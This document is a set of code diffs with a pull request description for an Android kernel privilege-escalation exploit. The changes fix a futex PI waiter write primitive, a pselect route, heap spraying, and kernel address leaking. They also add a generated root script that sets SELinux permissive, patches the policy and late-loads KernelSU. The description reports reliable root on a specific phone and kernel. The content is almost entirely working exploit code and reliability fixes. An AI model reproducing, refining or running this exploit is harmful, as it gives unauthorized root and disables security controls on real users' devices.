+            attempt, attempts, ret, saved_errno, calls, success, delay_usec);
+
+    if (calls > 0 && success > 0) {
+      route_last_step = 0;
+      route_last_errno = 0;
+      winner = 1;
+    } else {
+      route_last_step = 33;
+      route_last_errno = saved_errno;
+    }
+
+    /* open_selected_fds only closes its own F_DUPFD copy */
+    if (consumer_stuck) {
+      /* stuck in sched_setattr or futex, closing would reclaim objects its
+       * syscall still uses, leak and let process exit reclaim them */
+      route_last_step = 34;
+      pr_error("pselect consumer still inflight, leaking route fds\n");
+      break;
+    }
     if (block_fd != pipefd[0]) {
       close(block_fd);
     }
-    close(pipefd[0]);
-    close(pipefd[1]);
+
+    if (winner) {
+      break;
+    }
   }
+
+  close(pipefd[0]);
+  close(pipefd[1]);
 
   pr_info("pselect route done calls=%d success=%d step=%d errno=%d\n",
           calls, success, route_last_step, route_last_errno);

--- a/src/core/kernelsnitch/kernelsnitch.h
+++ b/src/core/kernelsnitch/kernelsnitch.h
@@ -230,8 +230,14 @@ static void *__mm_leak(void *arg)
     for (size_t coarse_addr = range->start; (coarse_addr < range->end) && !ks->found; coarse_addr += COARSE_SZ) {
         if ((coarse_addr % (1ULL << 40)) == 0)
             if (ks->verbose) pr_info("[% 3zd] [%016zx-%016llx]\n", range->id, coarse_addr, coarse_addr + (1ULL << 40));
-        for (size_t slab_addr = coarse_addr; (slab_addr < coarse_addr + COARSE_SZ) && !ks->found; slab_addr += mm_slab_sz) {
-            for (size_t mm_struct_candidate = slab_addr; (mm_struct_candidate < slab_addr + mm_slab_sz) && !ks->found; mm_struct_candidate += ks->mm_struct_sz) {
+        size_t slab_end = coarse_addr + COARSE_SZ;
+        if (slab_end > range->end)
+            slab_end = range->end;
+        for (size_t slab_addr = coarse_addr; (slab_addr < slab_end) && !ks->found; slab_addr += mm_slab_sz) {
+            size_t slab_limit = slab_addr + mm_slab_sz;
+            if (slab_limit > slab_end)
+                slab_limit = slab_end;
+            for (size_t mm_struct_candidate = slab_addr; (mm_struct_candidate < slab_limit) && !ks->found; mm_struct_candidate += ks->mm_struct_sz) {
 
                 if (mm_leak_arg->try_canonical) {
                     size_t canonical_candidate = (mm_struct_candidate & ~(0xfULL << 56)) | (0xfULL << 56);

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -231,7 +231,7 @@ void *waiter_thread(void *arg __attribute__((unused))) {
   int tid = (int)syscall(SYS_gettid);
   atomic_store(&waiter_tid, tid);
   if (futex_op(&f_pi_chain, FUTEX_LOCK_PI, 0, NULL, NULL, 0) != 0)
-    pr_error("waiter lock chain errno=%d\n", errno);
+    pr_warning("waiter lock chain errno=%d\n", errno);
   atomic_store(&waiter_ready, 1);
   while (!atomic_load(&owner_started)) usleep(1000);
   struct timespec timeout;
@@ -253,7 +253,7 @@ void *waiter_thread(void *arg __attribute__((unused))) {
 void *owner_thread(void *arg __attribute__((unused))) {
   disable_rseq_for_thread();
   long lock_target = futex_op(&f_pi_target, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
-  if (lock_target != 0) pr_error("owner lock target errno=%d\n", errno);
+  if (lock_target != 0) pr_warning("owner lock target errno=%d\n", errno);
   while (!atomic_load(&waiter_ready)) usleep(1000);
   atomic_store(&owner_started, 1);
   futex_op(&f_pi_chain, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
@@ -367,8 +367,8 @@ static int do_one_write(uintptr_t target, const char *desc, int mode, int leaf) 
    * payload fired at a value target zeroes it */
   int arm_matches = leaf ? (fake_right == 0) : (fake_right != 0);
   if (!arm_matches) {
-    pr_error("  payload arm mismatch leaf=%d fake_right=%016zx; skipping "
-             "write\n", leaf, fake_right);
+    pr_warning("  payload arm mismatch leaf=%d fake_right=%016zx; skipping "
+               "write\n", leaf, fake_right);
     clear_pselect_write();
     return 0;
   }

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -20,6 +20,9 @@ const struct kernel_offsets *active_offsets = NULL;
 
 static char g_home_dir[256] = "/data/local/tmp";
 static char g_root_script_path[300] = "/data/local/tmp/.ghostlock_root.sh";
+/* the root script creates this as root, so the caller picks a per-run name
+ * and a leftover cannot be read as this run's output */
+static char g_ksu_log_path[320] = "/data/local/tmp/.ghostlock_ksu.log";
 
 /* MTK and XRing use different physical mappings from the Qualcomm default.
  * W1 has no root and /proc is SELinux-blocked: read SoC properties from the
@@ -506,6 +509,13 @@ static void init_runtime_paths(void) {
   }
   snprintf(g_root_script_path, sizeof(g_root_script_path),
            "%s/.ghostlock_root.sh", g_home_dir);
+  const char *ksu_log = getenv("GHOSTLOCK_KSU_LOG");
+  if (ksu_log && ksu_log[0]) {
+    snprintf(g_ksu_log_path, sizeof(g_ksu_log_path), "%s", ksu_log);
+  } else {
+    snprintf(g_ksu_log_path, sizeof(g_ksu_log_path),
+             "%s/.ghostlock_ksu.log", g_home_dir);
+  }
   pr_info("runtime home=%s script=%s\n", g_home_dir, g_root_script_path);
 }
 
@@ -522,7 +532,7 @@ static void write_root_script(void) {
       script, sizeof(script),
       "#!/system/bin/sh\n"
       "HOME_DIR='%s'\n"
-      "LOG=\"$HOME_DIR/.ghostlock_ksu.log\"\n"
+      "LOG='%s'\n"
       "KSUD=\"$HOME_DIR/ksud\"\n"
       "echo \"[*] root script start uid=$(id -u) euid=$(id -u)\" >\"$LOG\"\n"
       "chmod 644 \"$LOG\" 2>/dev/null\n"
@@ -644,7 +654,7 @@ static void write_root_script(void) {
       "else\n"
       "  echo '[!] fixup failed; SELinux left permissive' >>\"$LOG\"\n"
       "fi\n",
-      g_home_dir);
+      g_home_dir, g_ksu_log_path);
   if (n < 0 || n >= (int)sizeof(script)) {
     pr_warning("root script too long\n");
     close(sfd);
@@ -847,6 +857,8 @@ static void child_main(struct child_pipes *p) {
     int fl = fcntl(fd, F_GETFD);
     if (fl >= 0) fcntl(fd, F_SETFD, fl | FD_CLOEXEC);
   }
+  /* the script appends to this path, a leftover reads as this run's result */
+  unlink(g_ksu_log_path);
   pid_t worker = fork();
   if (worker == 0) {
     /* Detach into a brand-new session: the independent root shell owns the
@@ -1287,9 +1299,7 @@ int run_exploit(int argc, char **argv) {
   int ksu_log_loaded = 0;
   int ksu_log_failed = 0;
   for (int i = 0; i < 60 && !(ksu_log_loaded || ksu_log_failed); i++) {
-    char ksu_log_path[320];
-    snprintf(ksu_log_path, sizeof(ksu_log_path), "%s/.ghostlock_ksu.log", g_home_dir);
-    FILE *lf = fopen(ksu_log_path, "r");
+    FILE *lf = fopen(g_ksu_log_path, "r");
     if (lf) {
       char line[256];
       while (fgets(line, sizeof(line), lf)) {

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -842,13 +842,16 @@ static void child_main(struct child_pipes *p) {
         ((uint32_t)len << 8) | (uint32_t)(unsigned char)comm[0];
       write(p->uid_w, &report, sizeof(report));
     }
-    else if (cmd == 'P') {
+    else if (cmd == 'P' || (cmd == 'X' && getuid() == 0)) {
       /* w2 rooted this task; park */
       close(p->cmd_r);
       close(p->uid_w);
       park_rooted_child();
     }
-    else if (cmd == 'G' || cmd == 'X') break;
+    else if (cmd == 'G') break;
+    /* X retires a task w2 rooted without starting the root script. a rooted
+     * exit drops the init_cred ref w2 never took, so it parks above. */
+    else if (cmd == 'X') _exit(1);
   }
   close(p->cmd_r);
   if (getuid() != 0) { close(p->uid_w); _exit(1); }
@@ -885,7 +888,7 @@ static int raise_pipe_fd(int fd) {
   int high = fcntl(fd, F_DUPFD, PSELECT_ROUTE_NFDS + 96);
   if (high < 0) {
     pr_warning("pipe fd raise failed fd=%d errno=%d\n", fd, errno);
-    return fd;
+    return -1;
   }
   close(fd);
   return high;
@@ -894,9 +897,13 @@ static int raise_pipe_fd(int fd) {
 static pid_t spawn_child(struct child_pipes *p) {
   int p1[2], p2[2], p3[2];
   if (pipe(p1) < 0 || pipe(p2) < 0 || pipe(p3) < 0) return -1;
-  p->task_r = raise_pipe_fd(p1[0]); p->task_w = raise_pipe_fd(p1[1]);
-  p->cmd_r = raise_pipe_fd(p2[0]); p->cmd_w = raise_pipe_fd(p2[1]);
-  p->uid_r = raise_pipe_fd(p3[0]); p->uid_w = raise_pipe_fd(p3[1]);
+  int *raised[6] = {&p->task_r, &p->task_w, &p->cmd_r,
+                    &p->cmd_w,  &p->uid_r,  &p->uid_w};
+  int *raw[6] = {&p1[0], &p1[1], &p2[0], &p2[1], &p3[0], &p3[1]};
+  for (int i = 0; i < 6; i++) {
+    *raised[i] = raise_pipe_fd(*raw[i]);
+    if (*raised[i] < 0) return -1;
+  }
   pid_t child = fork();
   if (child < 0) return -1;
   if (child == 0) { child_main(p); _exit(1); }
@@ -1211,9 +1218,9 @@ int run_exploit(int argc, char **argv) {
               verify_leaf_dir_stage, &w3_context, 1)) {
         if (child_alive) {
           write(pipes.cmd_w, "X", 1);
-          close(pipes.cmd_w);
-          close(pipes.uid_r);
           waitpid(child, NULL, WNOHANG);
+          /* the next round takes over the pipe fds */
+          child_alive = 0;
         }
         pr_warning("W3 leaf direction probe failed; not writing blind\n");
         continue;
@@ -1315,7 +1322,7 @@ int run_exploit(int argc, char **argv) {
   }
   kernelsu_ready = kernelsu_ready || ksu_log_loaded;
   /* enforcing takes the app dir away from the root script, so its log stops
-   * before the restore. read the state here instead. */
+   * before the restore. the state has to be read from here. */
   int enforced = 0;
   for (int i = 0; i < 20 && !(enforced = !check_selinux_off()); i++)
     usleep(500000);

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -360,6 +360,15 @@ static int do_one_write(uintptr_t target, const char *desc, int mode, int leaf) 
   page_base = prepare_good_kernel_page();
   if (!page_base) { pr_warning("  heap spray failed\n"); clear_pselect_write(); return 0; }
   TIMER("  heap spray done");
+  /* only the leaf arm stores zero, and the value arm does not, so a leaf
+   * payload fired at a value target zeroes it */
+  int arm_matches = leaf ? (fake_right == 0) : (fake_right != 0);
+  if (!arm_matches) {
+    pr_error("  payload arm mismatch leaf=%d fake_right=%016zx; skipping "
+             "write\n", leaf, fake_right);
+    clear_pselect_write();
+    return 0;
+  }
   int routed = run_main_route_threads();
   TIMER("  PI route done");
   clear_pselect_write();

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -194,7 +194,10 @@ static double timer_ms(void) {
   clock_gettime(CLOCK_MONOTONIC, &now);
   return (now.tv_sec - t0.tv_sec) * 1000.0 + (now.tv_nsec - t0.tv_nsec) / 1e6;
 }
-#define TIMER(label) pr_info("[T+%.0fms] %s\n", timer_ms(), label)
+#define TIMER(label) do { \
+    pr_info("[T+%.0fms] %s\n", timer_ms(), label); \
+    log_sync(); \
+  } while (0)
 
 extern int pselect_custom_write;
 extern uintptr_t pselect_custom_target;

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -557,10 +557,7 @@ static void write_root_script(void) {
       "if [ \"$(id -u)\" -ne 0 ]; then\n"
       "  echo '[!] temp su unavailable; aborting' >>\"$LOG\"\n"
       "  exit 1\n"
-       "fi\n"
-       "if grep -q '^kernelsu[[:space:]]' /proc/modules 2>/dev/null; then\n"
-       "  echo '[+] KernelSU already loaded' >>\"$LOG\"\n"
-       "fi\n"
+      "fi\n"
       "KVER=$(uname -r | cut -d. -f1-2)\n"
       "AVER=$(uname -r | grep -o 'android[0-9]*' | head -1)\n"
       "if [ -z \"$AVER\" ] || [ -z \"$KVER\" ]; then\n"
@@ -600,7 +597,12 @@ static void write_root_script(void) {
       "  CONFIG=$(printf '\\\\0%%03o' \"$((CONFIG | 192))\") || return 1\n"
       "  printf '%%b' \"$CONFIG\" | dd of=\"$POLICY\" bs=1 seek=23 count=1 conv=notrunc\n"
       "}\n"
+      "KSU_ALREADY=0\n"
+      "if grep -q kernelsu /proc/modules 2>/dev/null; then\n"
+      "  KSU_ALREADY=1\n"
+      "fi\n"
       "FIXUP_RC=1\n"
+      "# a reload unlabels running processes, init exits 127 on the stale SID\n"
       "for i in $(seq 1 10); do\n"
       "  echo \"[*] fixup: attempt $i\" >>\"$LOG\"\n"
       "  if ! prepare_policy >>\"$LOG\" 2>&1; then\n"
@@ -621,39 +623,38 @@ static void write_root_script(void) {
       "done\n"
       "echo \"[*] policy fixup rc=$FIXUP_RC\" >>\"$LOG\"\n"
       "if [ \"$FIXUP_RC\" -eq 0 ]; then\n"
-      "# load_policy ok: late-load (module init re-enforces); already-loaded restores below\n"
-      "if grep -q kernelsu /proc/modules 2>/dev/null; then\n"
-      "  KSU_ALREADY=1\n"
-      "  echo \"[*] kernelsu already loaded; skipping late-load\" >>\"$LOG\"\n"
+      "# load_policy ok: late-load only when the module is not in the tree yet\n"
+      "if [ \"$KSU_ALREADY\" -eq 1 ]; then\n"
+      "  echo '[+] kernelsu already loaded; no late-load' >>\"$LOG\"\n"
       "else\n"
-      "  KSU_ALREADY=0\n"
       "  if [ ! -x \"$KSUD\" ]; then\n"
       "    echo '[!] ksud missing; cannot late-load' >>\"$LOG\"\n"
       "    exit 1\n"
       "  fi\n"
-      "  echo \"[*] late-load kmi=$KMI\" >>\"$LOG\"\n"
+      "  echo \"[*] late-load kmi=$KMI as uid=$(id -u)\" >>\"$LOG\"\n"
       "  chmod 755 \"$KSUD\" 2>/dev/null\n"
       "  \"$KSUD\" late-load --kmi \"$KMI\" --allow-shell >>\"$LOG\" 2>&1\n"
       "  echo \"[*] late-load exit=$?\" >>\"$LOG\"\n"
+      "  KSU_READY=0\n"
+      "  for i in $(seq 1 50); do\n"
+      "    if grep -q kernelsu /proc/modules 2>/dev/null; then KSU_READY=1; break; fi\n"
+      "    sleep 0.1\n"
+      "  done\n"
+      "  if [ \"$KSU_READY\" -ne 1 ]; then\n"
+      "    echo '[!] KernelSU module not loaded' >>\"$LOG\"\n"
+      "    exit 1\n"
+      "  fi\n"
+      "  echo '[+] KernelSU module loaded' >>\"$LOG\"\n"
       "fi\n"
-      "echo \"[*] temp su uid=$(id -u); watching kernelsu.ko\" >>\"$LOG\"\n"
-      "KSU_READY=0\n"
-      "for i in $(seq 1 50); do\n"
-      "  if grep -q kernelsu /proc/modules 2>/dev/null; then KSU_READY=1; break; fi\n"
-      "  sleep 0.1\n"
-      "done\n"
-      "if [ \"$KSU_READY\" -ne 1 ]; then\n"
-      "  echo '[!] KernelSU module not loaded' >>\"$LOG\"\n"
-      "  exit 1\n"
-      "fi\n"
-      "echo '[+] KernelSU module loaded' >>\"$LOG\"\n"
-      "if [ \"$KSU_ALREADY\" -eq 1 ]; then\n"
-      "  echo \"[*] kernelsu already loaded; restoring enforcing\" >>\"$LOG\"\n"
+      "# enforcing puts the app dir out of reach, so the native side reads\n"
+      "# the outcome\n"
+      "if [ \"$(cat /sys/fs/selinux/enforce 2>/dev/null)\" != \"1\" ]; then\n"
       "  echo 1 > /sys/fs/selinux/enforce 2>/dev/null\n"
       "fi\n"
       "else\n"
       "  echo '[!] fixup failed; SELinux left permissive' >>\"$LOG\"\n"
-      "fi\n",
+      "fi\n"
+      "exit 0\n",
       g_home_dir, g_ksu_log_path);
   if (n < 0 || n >= (int)sizeof(script)) {
     pr_warning("root script too long\n");
@@ -1298,40 +1299,30 @@ int run_exploit(int argc, char **argv) {
    * the app-readable log for the loaded-module line (up to ~30s). */
   int ksu_log_loaded = 0;
   int ksu_log_failed = 0;
-  for (int i = 0; i < 60 && !(ksu_log_loaded || ksu_log_failed); i++) {
+  for (int i = 0; i < 60 && !ksu_log_failed && !ksu_log_loaded; i++) {
     FILE *lf = fopen(g_ksu_log_path, "r");
     if (lf) {
       char line[256];
       while (fgets(line, sizeof(line), lf)) {
         if (strstr(line, "[+] KernelSU module loaded") ||
-            strstr(line, "[+] KernelSU already loaded"))
+            strstr(line, "[+] kernelsu already loaded"))
           ksu_log_loaded = 1;
         if (strstr(line, "[!] KernelSU module not loaded")) ksu_log_failed = 1;
       }
       fclose(lf);
     }
-    if (!(ksu_log_loaded || ksu_log_failed)) usleep(500000);
+    if (!ksu_log_failed && !ksu_log_loaded) usleep(500000);
   }
-  /* Module init re-enforces at the very end of kernelsu_init; wait up to
-   * 20s for it. Denied read or value 1 both mean enforcing here. */
-  int enforce_ok = 0;
-  for (int i = 0; ksu_log_loaded && !enforce_ok && i < 200; i++) {
-    int efd = open("/sys/fs/selinux/enforce", O_RDONLY | O_CLOEXEC);
-    if (efd < 0) {
-      enforce_ok = 1;
-      break;
-    }
-    char eb[4] = {0};
-    ssize_t rn = read(efd, eb, sizeof(eb));
-    close(efd);
-    if (rn > 0 && eb[0] == '1') enforce_ok = 1;
-    if (!enforce_ok) usleep(100000);
-  }
-  if (enforce_ok)
-    pr_info("enforce=1 (enforcing)\n");
-  else if (ksu_log_loaded)
-    pr_warning("enforce=0 (still permissive)\n");
   kernelsu_ready = kernelsu_ready || ksu_log_loaded;
+  /* enforcing takes the app dir away from the root script, so its log stops
+   * before the restore. read the state here instead. */
+  int enforced = 0;
+  for (int i = 0; i < 20 && !(enforced = !check_selinux_off()); i++)
+    usleep(500000);
+  if (enforced)
+    pr_success("enforcing restored\n");
+  else
+    pr_warning("SELinux left permissive\n");
 
   /* Fixup: permissive, load_policy, late-load. Module init re-enforces;
    * policy reload keeps it working after enforcing is back. */

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -1164,14 +1164,22 @@ int run_exploit(int argc, char **argv) {
     int tcp_writes = tcp_route_selected();
     struct w3_stage_context w3_context = {
       .pipes = &pipes,
-      .leaf_to_target8 = !tcp_writes,
+      .leaf_to_target8 = 0,
     };
     if (!tcp_writes) {
-      int dir_ok = retry_write_stage(
-          "W3-0: leaf dir", child_task + TASK_COMM_OFF, 1, 4, 50000,
-          verify_leaf_dir_stage, &w3_context, 1);
-      if (!dir_ok) {
-        pr_warning("W3 leaf direction probe failed; assuming [target+8]\n");
+      /* a failed probe must not pick a side, guessing [target+8] would zero
+       * the word before it, inside the task struct */
+      if (!retry_write_stage(
+              "W3-0: leaf dir", child_task + TASK_COMM_OFF, 1, 4, 50000,
+              verify_leaf_dir_stage, &w3_context, 1)) {
+        if (child_alive) {
+          write(pipes.cmd_w, "X", 1);
+          close(pipes.cmd_w);
+          close(pipes.uid_r);
+          waitpid(child, NULL, WNOHANG);
+        }
+        pr_warning("W3 leaf direction probe failed; not writing blind\n");
+        continue;
       }
     }
 

--- a/src/core/main.c
+++ b/src/core/main.c
@@ -866,12 +866,24 @@ static void child_main(struct child_pipes *p) {
   park_rooted_child();
 }
 
+/* the route dup2s its block fd over every low fd in the fdset, so keep the
+ * child pipes above PSELECT_ROUTE_NFDS or verify reads hit a timerfd */
+static int raise_pipe_fd(int fd) {
+  int high = fcntl(fd, F_DUPFD, PSELECT_ROUTE_NFDS + 96);
+  if (high < 0) {
+    pr_warning("pipe fd raise failed fd=%d errno=%d\n", fd, errno);
+    return fd;
+  }
+  close(fd);
+  return high;
+}
+
 static pid_t spawn_child(struct child_pipes *p) {
   int p1[2], p2[2], p3[2];
   if (pipe(p1) < 0 || pipe(p2) < 0 || pipe(p3) < 0) return -1;
-  p->task_r = p1[0]; p->task_w = p1[1];
-  p->cmd_r = p2[0]; p->cmd_w = p2[1];
-  p->uid_r = p3[0]; p->uid_w = p3[1];
+  p->task_r = raise_pipe_fd(p1[0]); p->task_w = raise_pipe_fd(p1[1]);
+  p->cmd_r = raise_pipe_fd(p2[0]); p->cmd_w = raise_pipe_fd(p2[1]);
+  p->uid_r = raise_pipe_fd(p3[0]); p->uid_w = raise_pipe_fd(p3[1]);
   pid_t child = fork();
   if (child < 0) return -1;
   if (child == 0) { child_main(p); _exit(1); }

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -386,7 +386,7 @@ int prepare_skb_payload(uintptr_t base) {
       put64(p, W0_OFF + 0x00, 1);           /* tree_entry.rb_parent_color */
       put64(p, W0_OFF + 0x08, 0);           /* tree_entry.rb_right */
       put64(p, W0_OFF + 0x10, 0);           /* tree_entry.rb_left */
-      if (tcp && write_right) {
+      if (write_right) {
         put64(p, W0_OFF + 0x18, write_right);
         put64(p, W0_OFF + 0x20, 0);
         put64(p, W0_OFF + 0x28, pselect_custom_target);

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -181,7 +181,7 @@ long sched_setattr_tid(int tid, int nice_value) {
   errno = 0;
   long ret = syscall(274, tid, &attr, 0);
   if (ret != 0) {
-    pr_error("sched_setattr(%d,BATCH,nice=%d) ret=%ld errno=%d\n", tid, nice_value, ret, errno);
+    pr_warning("sched_setattr(%d,BATCH,nice=%d) ret=%ld errno=%d\n", tid, nice_value, ret, errno);
   }
   return ret;
 }

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -131,8 +131,13 @@ void log_startup_context(void) {
                "Seccomp_filters=%s", values[0], values[1], values[2]);
     }
   }
-  pr_success("startup context pid=%d uid=%u euid=%u gid=%u egid=%u attr=%s enforce=%s\n",
-             getpid(), getuid(), geteuid(), getgid(), getegid(), attr,
+  struct timespec boot;
+  clock_gettime(CLOCK_BOOTTIME, &boot);
+  double boot_ms = boot.tv_sec * 1000.0 + boot.tv_nsec / 1e6;
+  /* same clock as printk's [timestamp], so a native log line maps onto dmesg */
+  pr_success("startup context pid=%d uid=%u euid=%u gid=%u egid=%u boot_ms=%.0f "
+             "attr=%s enforce=%s\n",
+             getpid(), getuid(), geteuid(), getgid(), getegid(), boot_ms, attr,
              enforce);
   pr_success("startup limits pid=%d %s\n", getpid(), limits);
   pr_success("build config pid=%d label=%s slide=pselect main=pselect\n",

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -19,6 +19,13 @@ static long long ms_since(struct timespec *t0) {
          (now.tv_nsec - t0->tv_nsec) / 1000000LL;
 }
 
+/* f2fs rollback drops everything since the last checkpoint, so fsync at
+ * stage boundaries or a panicking run loses its own lines */
+void log_sync(void) {
+  fflush(stdout);
+  fsync(STDOUT_FILENO);
+}
+
 uintptr_t page_base;
 uintptr_t last_mm_struct;
 uintptr_t fake_lock;

--- a/src/core/util.c
+++ b/src/core/util.c
@@ -677,7 +677,7 @@ uintptr_t prepare_kernel_page(void) {
 }
 
 uintptr_t prepare_good_kernel_page(void) {
-  int max_attempts = 4;
+  int max_attempts = 12;
   struct timespec t_good;
   clock_gettime(CLOCK_MONOTONIC, &t_good);
   struct timespec deadline = t_good;
@@ -685,9 +685,17 @@ uintptr_t prepare_good_kernel_page(void) {
   for (int attempt = 1; attempt <= max_attempts; attempt++) {
     uintptr_t base = prepare_kernel_page();
     if (base) {
-      pr_info("prepare_kernel_page ok attempt=%d +%lldms\n", attempt,
-              ms_since(&t_good));
-      return base;
+      /* W1 stores this page address, so the word's byte 2 lands on
+       * selinux_state.initialized. an even byte there fails every SID lookup */
+      if (pselect_custom_write == 1 && pselect_child_node &&
+          ((fake_right >> 16) & 1) == 0) {
+        pr_warning("page %016zx stores an even byte over "
+                   "selinux_state.initialized; taking another\n", (size_t)base);
+      } else {
+        pr_info("prepare_kernel_page ok attempt=%d +%lldms\n", attempt,
+                ms_since(&t_good));
+        return base;
+      }
     }
     struct timespec now;
     clock_gettime(CLOCK_MONOTONIC, &now);


### PR DESCRIPTION
the pselect route never hit root on 6.1 because the fake futex waiter layout was backwards. tcp builds `{pc=value, right=0, left=target}`, which writes value to target. pselect built `{pc=target-8, right=value, left=0}`, which writes target-8 to value and trashes `init_cred` on w2.

pselect only:

* the waiter layout swap
* reroll when the leaf direction probe fails instead of guessing
* move the w2 child pipes above the route fd range
* keep the route fds open while the consumer is inflight

both routes:

* reject payload pages that clobber `selinux_state.initialized`
* drop leaf waiters aimed at a value target
* stop the slab scan at the range end
* retire a failed-probe w3 child instead of rooting it again
* fsync at stage boundaries so f2fs rollback doesn't drop a panicking run's log

compact entries still default to tcp.

tested on a poco x6 pro 5g (6.1.138-android14-11), 5/5 roots on both routes with reboots between runs.
